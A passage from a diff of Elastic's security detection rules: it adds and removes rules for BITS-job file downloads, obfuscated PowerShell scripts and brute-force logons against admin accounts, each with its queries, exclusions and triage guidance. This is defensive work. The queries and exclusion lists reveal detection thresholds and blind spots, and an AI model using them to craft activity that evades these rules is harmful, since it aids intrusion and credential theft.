droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"vbe\", \"wsh\", \"wsf\", \"sct\", \"js\", \"jse\", \"hta\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\AcroServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", + "references": [ + "https://attack.mitre.org/techniques/T1197/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": false, + "name": "file.Ext.original.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f95972d3-c23b-463b-89a8-796b3f369b49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 12 + }, + "id": "f95972d3-c23b-463b-89a8-796b3f369b49_12", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_6.json b/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_6.json deleted file mode 100644 index b9ad02588b9..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_6.json +++ /dev/null @@ -1,188 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Identifies PowerShell scripts with an abnormally high proportion of non-alphanumeric characters, often resulting from encoding, string mangling, or dynamic code generation.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via High Special Character Proportion", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n// Excludes spaces, #, = and - as they are heavily used in scripts for formatting\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[^0-9A-Za-z\\s#=-]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_pattern_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_ratio,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high special character ratio\n| where Esql.script_block_ratio > 0.35\n\n// Exclude Noisy Patterns\n| where not file.directory like \"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection\\\\\\\\*\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory IS NULL\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_ratio", - "type": "double" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f9753455-8d55-4ad8-b70a-e07b6f18deea", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Rule Type: BBR" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "f9753455-8d55-4ad8-b70a-e07b6f18deea_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_114.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_114.json deleted file mode 100644 index 36b50ddd6a1..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_114.json +++ /dev/null @@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" - ], - "related_integrations": [ - { - "package": "system", - "version": "^2.0.0" - }, - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Status", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 114 - }, - "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_114", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_118.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_118.json new file mode 100644 index 00000000000..de4a585c416 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_118.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Privileged Accounts Brute Force", + "note": "## Triage and analysis\n\n### Investigating Privileged Accounts Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against multiple accounts that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where event.category == \"authentication\" and host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type == \"Network\" and source.ip is not null and winlog.computer_name is not null and\n not cidr_match(TO_IP(source.ip), \"127.0.0.0/8\", \"::1\") and\n to_lower(winlog.event_data.TargetUserName) like \"*admin*\" and\n /*\n noisy failure status codes often associated to authentication misconfiguration\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E - There are currently no logon servers available to service the logon request.\n 0XC0000133 - Clocks between DC and other computer too far out of sync.\n 0XC0000192 An attempt was made to logon, but the Netlogon service was not started.\n 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication.\n */\n not winlog.event_data.Status in (\"0xc000015b\", \"0xc000005e\", \"0xc0000133\", \"0xc0000192\", \"0xc00000dc\")\n// truncate the timestamp to a 60-second window\n| eval Esql.time_window = date_trunc(60 seconds, @timestamp)\n| stats Esql.failed_auth_count = COUNT(*),\n Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName),\n Esql.count_distinct_user_name = count_distinct(winlog.event_data.TargetUserName),\n Esql.user_domain_values = VALUES(user.domain),\n Esql.error_codes = VALUES(winlog.event_data.Status),\n Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type\n| where Esql.failed_auth_count >= 50 and Esql.count_distinct_user_name >= 2\n| eval user.name = mv_first(Esql.target_user_name_values)\n| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.*\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" + ], + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_user_name", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace.values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.error_codes", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.failed_auth_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.target_user_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.time_window", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_domain_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "esql", + "version": 118 + }, + "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_118", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_8.json b/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_8.json deleted file mode 100644 index 5af8eb64091..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_8.json +++ /dev/null @@ -1,188 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts with a disproportionately high number of numeric characters, often indicating the presence of obfuscated or encoded payloads. This behavior is typical of obfuscation methods involving byte arrays, character code manipulation, or embedded encoded strings used to deliver and execute malicious content.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via High Numeric Character Proportion", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via High Numeric Character Proportion\n\nPowerShell is a powerful scripting language used for system administration, but adversaries exploit its capabilities to obfuscate malicious scripts. Obfuscation often involves encoding payloads using numeric characters, making detection challenging. The detection rule identifies scripts with a high proportion of numeric characters, signaling potential obfuscation. By analyzing script length and numeric density, it flags suspicious activity, aiding in defense evasion detection.\n\n### Possible investigation steps\n\n- Review the script block text from the alert to understand the context and identify any obvious signs of obfuscation or malicious intent.\n- Examine the file path and host name fields to determine the origin and location of the script execution, which can help assess the potential impact and scope.\n- Check the user ID and agent ID fields to identify the user and system involved, which may provide insights into whether the activity is expected or suspicious.\n- Analyze the powershell.sequence and powershell.total fields to understand the sequence of script execution and the total number of scripts executed, which can indicate whether this is part of a larger pattern of behavior.\n- Investigate any related logs or alerts from the same host or user to identify patterns or correlations that might suggest broader malicious activity.\n\n### False positive analysis\n\n- Scripts with legitimate numeric-heavy content such as data processing or mathematical calculations may trigger the rule. To handle this, identify and whitelist specific scripts or script patterns that are known to be safe.\n- Automated scripts that generate or manipulate large datasets often contain high numeric content. Consider creating exceptions for scripts executed by trusted users or from known safe directories.\n- PowerShell scripts used for legitimate software installations or updates might include encoded data blocks. Review and exclude these scripts by verifying their source and purpose.\n- Scripts containing large hexadecimal strings for legitimate purposes, such as cryptographic operations, may be flagged. Use the exclusion pattern to filter out these known safe operations.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate scripts that may be introduced.\n\n### Response and remediation\n\n- Immediately isolate the affected host to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Review the PowerShell script block text and script block ID to identify any malicious payloads or encoded strings. If confirmed malicious, remove or quarantine the script.\n- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to detect and remove any additional threats or remnants of the obfuscated script.\n- Analyze the file path and user ID associated with the script execution to determine if unauthorized access or privilege escalation occurred. Revoke any suspicious user access and reset credentials if necessary.\n- Escalate the incident to the security operations center (SOC) for further investigation and correlation with other alerts to assess the scope and impact of the threat across the network.\n- Implement enhanced monitoring and logging for PowerShell activities on all endpoints to detect similar obfuscation attempts in the future, focusing on scripts with high numeric character proportions.\n- Review and update endpoint protection policies to restrict the execution of scripts with high numeric density, ensuring compliance with security best practices and reducing the risk of obfuscation-based attacks.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[0-9]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_pattern_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_ratio,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.directory,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high numeric character ratio\n| where Esql.script_block_ratio > 0.35\n\n// Exclude Windows Defender Noisy Patterns\n| where not (\n file.directory == \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\" or\n file.directory like (\n \"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection*\",\n \"C:\\\\\\\\Program Files\\\\\\\\SentinelOne\\\\\\\\Sentinel Agent*\"\n )\n )\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n| where not powershell.file.script_block_text like \"*[System.IO.File]::Open('C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection*\"\n| where not powershell.file.script_block_text : \"26a24ae4-039d-4ca4-87b4-2f64180311f0\"\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_ratio", - "type": "double" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - 